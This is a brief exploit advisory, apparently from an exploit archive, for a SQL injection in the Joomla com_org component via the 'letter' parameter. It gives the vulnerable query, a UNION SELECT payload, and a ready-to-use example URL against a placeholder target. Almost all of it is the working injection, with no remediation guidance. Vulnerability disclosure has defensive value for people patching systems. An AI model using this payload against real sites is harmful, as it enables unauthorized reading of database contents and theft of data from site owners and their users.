id: 11331
date: 03/15/2010
title: Joomla com_org SQL Injection Vulnerability (letter parameter)
author: kazuya
cves: 

=============================================================
Joomla com_org SQL Injection Vulnerability (letter parameter)
=============================================================

# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: kazuy0r@gmail.com Jabber: kazuya@jabber.ccc.de
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs



#  0day.today [2023-03-25]  #